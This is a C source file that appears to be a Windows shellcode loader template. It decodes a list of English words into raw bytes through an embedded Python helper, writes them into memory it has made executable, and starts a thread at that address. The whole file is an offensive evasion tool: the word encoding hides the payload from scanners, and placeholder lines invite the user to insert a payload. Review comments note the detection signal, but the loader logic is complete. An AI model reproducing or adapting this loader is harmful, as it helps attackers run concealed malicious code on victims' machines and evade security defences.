#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "C:\\mingw64\\opt\\include\\python3.11\\Python.h"
/*
Example payload taken from payload-generator. Note: this is not a working payload; it's just for representational purposes.
unsigned char *eng_words[] = {"governessdom","yggdrasil","fala","steatorrhoea","grandee","kathryn","lamping","strutting""fauvism"};
*/
// Your payload goes below
// Template placeholder: the next line is not valid C until it is replaced with a
// brace-enclosed list of string literals (see the commented example above).
// main() passes each string to the Python helper and writes the decoded bytes
// over this array's own storage.
unsigned char *eng_words[] = <Your payload with curly brackets>
/*
 * Decodes the word list in eng_words into raw bytes through an embedded
 * Python helper, writes those bytes over the eng_words array itself, and then
 * starts a thread whose entry point is the beginning of that array.
 *
 * Behaviour visible to a defender, in order:
 *   1. VirtualProtect() sets the array's pages to PAGE_EXECUTE_READWRITE.
 *   2. The CPython runtime is initialised in-process and a module named
 *      "payload" is imported.
 *   3. Bytes are written into the now writable+executable region.
 *   4. CreateThread() is called with a start address inside that region.
 * A protection change to RWX followed by a thread start in the same region is
 * a common behavioural detection signal, independent of the byte content.
 *
 * Always returns 0.
 */
int main(void) {
// Declared but never used in this function.
void * payload_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Make the storage of the pointer array itself readable, writable and executable.
// The result is kept in rv and only consulted right before CreateThread().
rv = VirtualProtect(eng_words, sizeof(eng_words), PAGE_EXECUTE_READWRITE, &oldprotect);
Py_Initialize();
PyObject *name, *func, *load_module, *args, *callfunc;
printf("\nConnecting to AI...\n");
// Import the Python module "payload" and look up its "getopcode" attribute.
// The module is located through Python's import machinery; its source is not
// part of this file.
// NOTE(review): none of name, load_module or func is checked for NULL, so a
// failed import leads to a NULL being passed to the next C-API call.
name = PyUnicode_FromString((char*)"payload");
load_module = PyImport_Import(name);
func = PyObject_GetAttrString(load_module,(char*)"getopcode");
// Both pointers start at the first element of eng_words: startPtr stays fixed
// (later used as the thread entry point), currentPointer is the write cursor.
void *startPtr = &eng_words[0];
void *currentPointer = &eng_words[0];
unsigned char* opc;
char* token;
unsigned char result;
// Number of string pointers in the array.
int arr_count = sizeof(eng_words)/sizeof(eng_words[0]);
printf("Fetching Payload! Hold on to your butts...\n");
for (int count=0; count < arr_count; count++){
// Call getopcode(word) with the current word as the single argument.
args = PyTuple_Pack(1, PyUnicode_FromString(eng_words[count]));
callfunc = PyObject_CallObject(func, args);
// NOTE(review): _PyUnicode_AsString is a private CPython name; presumably it
// returns the object's internal UTF-8 buffer, which strtok() below then
// modifies in place. callfunc is not checked for NULL. TODO confirm.
opc = _PyUnicode_AsString(callfunc);
// The returned string is treated as '|'-separated hexadecimal tokens.
token = strtok(opc, "|");
while(token != NULL) {
// Each token is parsed as base-16 and truncated to one byte.
result = (unsigned char)strtol(token, NULL, 16);
// Write that byte at the cursor. The destination is the same storage that
// eng_words[count] is read from on later iterations, so the order of reads
// and writes in this loop matters.
RtlMoveMemory(currentPointer, &result, sizeof(result));
// Advance the cursor by one byte (arithmetic on void* is a compiler extension).
currentPointer = currentPointer + sizeof(result);
token = strtok(NULL, "|");
}
}
// Append a single zero byte after the last decoded byte.
unsigned char null_byte = {0x00};
RtlMoveMemory(currentPointer, &null_byte, sizeof(null_byte));
Py_Finalize();
printf("Executing Payload...Boom\n");
// Only start the thread if the earlier VirtualProtect() call succeeded.
if ( rv != 0 ) {
// Thread entry point is the start of eng_words, i.e. the decoded bytes.
// NOTE(review): th is not checked for NULL and the handle is never closed.
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) startPtr, 0, 0, 0);
// -1 is the INFINITE timeout. This DWORD shadows the outer unsigned char result.
DWORD result = WaitForSingleObject(th, -1);
if (result == WAIT_FAILED) {
DWORD error = GetLastError();
// NOTE(review): "%d" is used with a DWORD (unsigned) argument.
printf("%d", error);
}
}
printf("Exiting...\n");
return 0;
}